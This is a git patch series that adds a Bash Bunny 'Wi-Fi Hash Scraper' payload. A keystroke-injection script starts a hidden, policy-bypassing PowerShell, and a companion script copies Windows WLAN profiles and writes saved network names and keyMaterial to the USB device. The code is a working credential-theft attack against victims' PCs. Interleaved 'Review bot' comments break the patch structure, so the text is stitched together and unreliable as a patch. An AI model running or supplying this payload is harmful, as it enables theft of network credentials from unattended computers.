From b0ebf99aad541ee2a0b83e015bf73f97d229796f Mon Sep 17 00:00:00 2001
From: KryptoKola <119087357+KryptoKola@users.noreply.github.com>
Date: Tue, 27 Dec 2022 02:50:50 -0500
Subject: [PATCH 1/4] Create payload.txt
---
 .../recon/WiFi-Hash-Scraper/payload.txt | 22 +++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 payloads/library/recon/WiFi-Hash-Scraper/payload.txt
diff --git a/payloads/library/recon/WiFi-Hash-Scraper/payload.txt b/payloads/library/recon/WiFi-Hash-Scraper/payload.txt
new file mode 100644
index 00000000..227ee717
--- /dev/null
+++ b/payloads/library/recon/WiFi-Hash-Scraper/payload.txt
@@ -0,0 +1,22 @@
+#!/bin/bash
+#
+# Title: Wi-Fi Hash Scraper
+#
+# Description:
+# Copies all of the known / saved WiFi password hashes from the victim's PC to the BashBunny's loot folder.
+#
+# Author: KryptoKola
+# Version: 1.0
+# Category: Recon
+# Target: Microsoft Windows 10 & 11
+
+ATTACKMODE HID STORAGE
+
+LED SETUP
+GET SWITCH_POSITION
+LED ATTACK
+RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel 'BashBunny').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')"
+Q DELAY 250
+Q ENTER
+Q DELAY 3000
+LED FINISH
From 9eda9728d0925275f8ee39c8b11ae15f79f998d2 Mon Sep 17 00:00:00 2001
From: KryptoKola <119087357+KryptoKola@users.noreply.github.com>
Date: Tue, 27 Dec 2022 02:55:30 -0500
Subject: [PATCH 2/4] Get-Hashes Script
---
 .../recon/WiFi-Hash-Scraper/Get-Hashes.ps1 | 22 +++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 payloads/library/recon/WiFi-Hash-Scraper/Get-Hashes.ps1
diff --git a/payloads/library/recon/WiFi-Hash-Scraper/Get-Hashes.ps1 b/payloads/library/recon/WiFi-Hash-Scraper/Get-Hashes.ps1
new file mode 100644
index 00000000..1f56aaf5
--- /dev/null
+++ b/payloads/library/recon/WiFi-Hash-Scraper/Get-Hashes.ps1
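Review bot: The header in payload.txt describes the collected data as "password hashes", but the companion Get-Hashes.ps1 on this page extracts the `name` and `keyMaterial` lines from the WLAN profile files, and `keyMaterial` is, as far as I know, normally a DPAPI-protected blob rather than a hash. The description would be more accurate as `# Copies the saved WLAN profile names and their protected keyMaterial values to the BashBunny's loot folder.`. The header also does not say that Get-Hashes.ps1 must sit in the same switch folder as payload.txt, which the `RUN WIN` line relies on. For anyone reading this from the detection side, that line starts a hidden-window `powershell` with `-EP Bypass` and `iex` of a script on a removable volume, all of which process-creation and script-block logging would record.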
@@ -0,0 +1,22 @@
+#Wi-Fi Information Scraper
+cd "~";
+$tDate = Get-Date -Format "MM-dd-yyyy";
+$vol = Get-Volume -FileSystemLabel BashBunny;
+$baseDir = $vol.DriveLetter + ":/loot/WiFi-Hash-Scraper/" + $tDate;
+$interfaceDir = $baseDir + "/Interfaces";
+$oFile = $baseDir + "/WiFi-Info.txt";
+Copy-Item "C:/ProgramData/Microsoft/Wlansvc/Profiles/Interfaces" "$interfaceDir" -R -Force;
+cd $interfaceDir;
+$temp = Get-ChildItem | Select-String "{";
+$interfaces = $temp -split "[Environment]::NewLine";
+foreach($iface in $interfaces){
+ cd $iface;
+ $ftemp = Get-ChildItem;
+ $files = $ftemp -split "[Environment]::NewLine";
+ foreach($sNet in $files){
+ $temp = cat "$sNet" | Select-String "name";$temp += "";$temp += cat $sNet | Select-String "keyMaterial";echo $temp | Out-File $oFile -Append
+ }
+ cd ../;
+}
+cd "~";
+Remove-Item $interfaceDir -R;
\ No newline at end of file
From 0189ae0fa886fe48b425eacb1df17d8a34b530ec Mon Sep 17 00:00:00 2001
From: KryptoKola <119087357+KryptoKola@users.noreply.github.com>
Date: Thu, 29 Dec 2022 21:48:23 -0500
Subject: [PATCH 3/4] Changed "BashBunny" to "${BB_LABEL}"
---
 payloads/library/recon/WiFi-Hash-Scraper/payload.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/payloads/library/recon/WiFi-Hash-Scraper/payload.txt b/payloads/library/recon/WiFi-Hash-Scraper/payload.txt
index 227ee717..f08e2141 100644
--- a/payloads/library/recon/WiFi-Hash-Scraper/payload.txt
+++ b/payloads/library/recon/WiFi-Hash-Scraper/payload.txt
@@ -15,7 +15,7 @@ ATTACKMODE HID STORAGE
 LED SETUP
 GET SWITCH_POSITION
 LED ATTACK
-RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel 'BashBunny').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')"
+RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel '${BB_LABEL}').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')"
 Q DELAY 250
 Q ENTER
 Q DELAY 3000
From 91da428d0823b752c47c39fe1886d6623d4fec22 Mon Sep 17 00:00:00 2001
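Review bot: Nothing in Get-Hashes.ps1 checks that `Copy-Item` succeeded before `cd $interfaceDir`. If the copy or the `cd` fails, the script stays in the home directory set by `cd "~"`, and the relative `Get-ChildItem` / `cat` calls can then read unrelated user files and append their matching lines to the loot file. A guard right after the copy keeps collection limited to the intended directory: `if (-not (Test-Path $interfaceDir)) { return }`. It is also worth a comment that `WiFi-Info.txt` holds the profile names and keyMaterial lines unencrypted on the removable volume, so that file needs controlled handling after a test.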
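Review bot: The `RUN WIN` line now expands `${BB_LABEL}`, but nothing in payload.txt sets that variable as of this commit; `GET BB_LABEL` only arrives in PATCH 4/4. Taken on its own, this commit therefore presumably passes an empty label to `Get-Volume -FileSystemLabel`. Squashing the two commits, or adding `GET BB_LABEL` here, would keep each commit self-consistent. Get-Hashes.ps1 from PATCH 2/4 also still hard-codes `-FileSystemLabel BashBunny`, so the two files disagree on how the volume is located.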
From: KryptoKola <119087357+KryptoKola@users.noreply.github.com> Date: Mon, 2 Jan 2023 19:20:57 -0500 Subject: [PATCH 4/4] Updated Setup to include GET BB_LABEL Updated Setup to include GET BB_LABEL --- payloads/library/recon/WiFi-Hash-Scraper/payload.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/payloads/library/recon/WiFi-Hash-Scraper/payload.txt b/payloads/library/recon/WiFi-Hash-Scraper/payload.txt index f08e2141..f32b91d5 100644 --- a/payloads/library/recon/WiFi-Hash-Scraper/payload.txt +++ b/payloads/library/recon/WiFi-Hash-Scraper/payload.txt @@ -11,6 +11,7 @@ # Target: Microsoft Windows 10 & 11 ATTACKMODE HID STORAGE +GET BB_LABEL LED SETUP GET SWITCH_POSITION